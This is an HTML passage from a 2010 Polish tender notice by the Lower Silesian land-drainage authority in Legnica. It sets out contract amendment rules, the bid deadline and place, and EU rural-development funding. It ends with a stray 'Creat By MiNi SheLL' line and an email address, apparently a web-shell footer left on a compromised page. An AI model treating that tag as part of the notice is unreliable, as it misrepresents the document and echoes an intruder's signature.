4.	Wystąpienie okoliczności, o których mowa w pkt 1-3 stanowi podstawę dla dokonania w tym zakresie przez Strony stosownej zmiany postanowień umowy, w tym zmiany zakresu rzeczowo finansowego przedmiotu umowy i-lub zmiany terminu do wykonania całości lub części przedmiotu umowy.
5.	Podjęcie uzgodnień w przedmiocie zmiany postanowień umowy następuje w formie pisemnego aneksu do umowy i wymaga uprzedniego pisemnego wniosku jednej ze Stron zwierającego opis zmiany, jej uzasadnienie i ewentualny opis wpływu zmiany na warunki wykonania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzmiuw.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu Oddział w Legnicy; ul. Macieja Rataja 32;  59-220 Legnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2010 godzina 10:00, miejsce: Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu Oddział w Legnicy; ul. Macieja Rataja 32;  59-220 Legnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 90 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich 2007-2013 działanie:
Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i
leśnictwa przez gospodarowanie rolniczymi zasobami wodnymi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com